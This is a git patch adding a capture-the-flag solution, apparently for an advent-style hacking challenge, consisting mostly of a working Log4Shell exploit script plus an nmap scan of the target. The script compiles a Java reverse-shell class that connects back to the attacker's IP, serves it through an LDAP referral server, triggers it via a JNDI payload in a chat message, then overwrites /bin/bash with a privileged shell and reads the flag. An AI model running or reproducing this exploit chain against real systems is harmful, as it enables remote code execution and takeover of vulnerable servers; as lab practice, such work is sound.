From d80372c8ffcba8276fbd71c74ed15cd471cd81ac Mon Sep 17 00:00:00 2001 From: Roman Hergenreder Date: Wed, 20 Dec 2023 18:21:20 +0100 Subject: [PATCH] Day 19 added --- Day 19/.gitattributes | 1 + Day 19/exploit.py | 173 +++++++++++++++++++++++ Day 19/machine | 51 +++++++ Day 19/marshalsec-0.0.3-SNAPSHOT-all.jar | 3 + 4 files changed, 228 insertions(+) create mode 100644 Day 19/.gitattributes create mode 100644 Day 19/exploit.py create mode 100644 Day 19/machine create mode 100644 Day 19/marshalsec-0.0.3-SNAPSHOT-all.jar diff --git a/Day 19/.gitattributes b/Day 19/.gitattributes new file mode 100644 index 0000000..1260584 --- /dev/null +++ b/Day 19/.gitattributes @@ -0,0 +1 @@ +marshalsec-0.0.3-SNAPSHOT-all.jar filter=lfs diff=lfs merge=lfs -text diff --git a/Day 19/exploit.py b/Day 19/exploit.py new file mode 100644 index 0000000..f387a52 --- /dev/null +++ b/Day 19/exploit.py @@ -0,0 +1,173 @@ +#!/usr/bin/env python + +# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit +# https://git.romanh.de/Roman/HackingScripts + +import os +import io +import re +import sys +import json +import time +import base64 +import requests +import subprocess +import urllib.parse +from bs4 import BeautifulSoup +from hackingscripts import util, rev_shell +from hackingscripts.fileserver import HttpFileServer +from urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) + +import signal +import threading + +IP_ADDRESS = util.get_address() +BASE_URL = "https://7e11237e-9c61-46e2-92ca-cf53299a0447.idocker.vuln.land" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337" +PROXIES = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} + +def request(method, uri, **kwargs): + if not uri.startswith("/") and uri != "": + uri = "/" + uri + + client = requests + if "session" in kwargs: + client = kwargs["session"] + del kwargs["session"] + + if "allow_redirects" not in kwargs: + kwargs["allow_redirects"] = False + + if "verify" not in kwargs: + kwargs["verify"] = False + + if "proxies" not in kwargs: + kwargs["proxies"] = PROXIES + + url = BASE_URL + uri + return client.request(method, url, **kwargs) + +def compile_java(shell_port): + java_code = f""" +import java.io.IOException; +import java.io.InputStream; +import java.io.OutputStream; +import java.net.Socket; + +public class Exploit {{ + + public Exploit() throws Exception {{ + String host = "{IP_ADDRESS}"; + int port = {shell_port}; + String cmd = "/bin/sh"; + Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start(); + Socket s = new Socket(host,port); + InputStream pi=p.getInputStream(), + pe = p.getErrorStream(), + si = s.getInputStream(); + OutputStream po = p.getOutputStream(), so = s.getOutputStream(); + while (!s.isClosed()) {{ + while (pi.available() > 0) + so.write(pi.read()); + while (pe.available() > 0) + so.write(pe.read()); + while (si.available() > 0) + po.write(si.read()); + so.flush(); + po.flush(); + Thread.sleep(50); + try {{ + p.exitValue(); + break; + }} catch (Exception e) {{ + }} + }} + p.destroy(); + s.close(); + }} +}} +""" + + with open("Exploit.java", "w") as f: + f.write(java_code) + + subprocess.run(["javac", "Exploit.java"]) + with open("Exploit.class", "rb") as f: + java_class = f.read() + + os.remove("Exploit.java") + os.remove("Exploit.class") + return java_class + +def send_message(msg): + json_data = { "name": "", "message": msg } + res = request("POST", "/up/sendmessage", json=json_data) + util.assert_status_code(res, 200) + +def get_privesc_code(): + c_code = b"""#include +#include +int main() { + printf(\"Spawning a shell with -p parameter...\"); + char *shell = \"/bin/sh\"; + char *args[] = {shell, \"-p\", NULL}; + execve(shell, args, NULL); + return 0; +} +""" + + return base64.b64encode(c_code).decode() + +if __name__ == "__main__": + + http_Port = 8000 + shell_port = 9001 + java_payload = compile_java(shell_port) + file_server = HttpFileServer("0.0.0.0", http_Port) + file_server.addFile("Exploit.class", java_payload) + file_server.enableLogging() + file_server.startBackground() + + payload = f"${{jndi:ldap://{IP_ADDRESS}:1389/b}}" + payload_url = file_server.get_full_url("#Exploit", ip_addr=IP_ADDRESS) + ldap_process = None + + def spawn_ldap_server(): + global ldap_process + ldap_process = subprocess.Popen([ + "java", + "-cp", + os.path.join("marshalsec-0.0.3-SNAPSHOT-all.jar"), + "marshalsec.jndi.LDAPRefServer", + payload_url + ]) + ldap_process.wait() + + print("[ ] Starting LDAP Server") + ldap_thread = threading.Thread(target=spawn_ldap_server) + ldap_thread.start() + + print("[ ] Triggering log4j shell") + shell = rev_shell.trigger_background_shell(lambda: send_message(payload), shell_port) + shell.os = "unix" + print("[+] Got shell!") + + privesc = get_privesc_code() + commands = [ + f"echo {privesc} | base64 -d > /tmp/shell.c && gcc /tmp/shell.c -o /bin/bash", + "/santas-workshop/tool", + "s", + "cat /home/santa/flag.txt", + "exit" + ] + for cmd in commands: + shell.sendline(cmd) + time.sleep(0.5) + + print("[+] Flag:", shell.raw_output.decode()) + shell.close() + + print("[ ] Stopping listeners...") + file_server.stop() + ldap_process.send_signal(signal.SIGINT) + ldap_thread.join() \ No newline at end of file diff --git a/Day 19/machine b/Day 19/machine new file mode 100644 index 0000000..3db6ddc --- /dev/null +++ b/Day 19/machine @@ -0,0 +1,51 @@ +Host: 3842c27c-9ff0-47de-b97a-9a9d5a892c87.idocker.vuln.land + +PORT STATE SERVICE VERSION +22/tcp filtered ssh +80/tcp open http Jetty 9.4.26v20200117 +|_http-title: Did not follow redirect to https://3842c27c-9ff0-47de-b97a-9a9d5a892c87.idocker.vuln.land:443/ +111/tcp open rpcbind 2-4 (RPC #100000) +| rpcinfo: +| program version port/proto service +| 100000 2,3,4 111/tcp rpcbind +| 100000 2,3,4 111/udp rpcbind +| 100000 3,4 111/tcp6 rpcbind +|_ 100000 3,4 111/udp6 rpcbind +443/tcp open ssl/http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) +| ssl-cert: Subject: commonName=*.idocker.vuln.land +| Subject Alternative Name: DNS:*.idocker.vuln.land, DNS:idocker.vuln.land +| Issuer: commonName=Thawte TLS RSA CA G1/organizationName=DigiCert Inc/countryName=US +| Public Key type: rsa +| Public Key bits: 3072 +| Signature Algorithm: sha256WithRSAEncryption +| Not valid before: 2023-09-04T00:00:00 +| Not valid after: 2024-09-08T23:59:59 +| MD5: 80d7:8bfe:9544:857d:d5ab:3419:4283:4228 +|_SHA-1: 7a7c:1086:65bb:52dd:6c97:238f:a29d:c680:1b8b:5a73 +| http-methods: +|_ Supported Methods: GET HEAD +|_http-server-header: Jetty(9.4.26.v20200117) +|_http-title: Minecraft Dynamic Map +| http-robots.txt: 5 disallowed entries +|_/tiles/ /js/ /standalone/ /images/ /css/ +8080/tcp open http-proxy +| fingerprint-strings: +| FourOhFourRequest, GetRequest, HTTPOptions: +| HTTP/1.0 401 Unauthorized +| Content-Type: text/plain +| Www-Authenticate: Basic realm="traefik" +| Date: Mon, 18 Dec 2023 23:25:56 GMT +| Content-Length: 17 +| Unauthorized +| GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, Socks5, TLSSessionReq, TerminalServerCookie: +| HTTP/1.1 400 Bad Request +| Content-Type: text/plain; charset=utf-8 +| Connection: close +|_ Request +|_http-title: Site doesn't have a title (text/plain). +| http-auth: +| HTTP/1.1 401 Unauthorized\x0D +|_ Basic realm=traefik +9100/tcp open jetdirect? +42810/tcp open fmproduct 1-4 (RPC #1073741824) +55555/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) diff --git a/Day 19/marshalsec-0.0.3-SNAPSHOT-all.jar b/Day 19/marshalsec-0.0.3-SNAPSHOT-all.jar new file mode 100644 index 0000000..d4d21c5 --- /dev/null +++ b/Day 19/marshalsec-0.0.3-SNAPSHOT-all.jar @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4f659fe73986787da27462f9cd2bf36603b47ceaa38b072338c369abdc2e1bd7 +size 42565306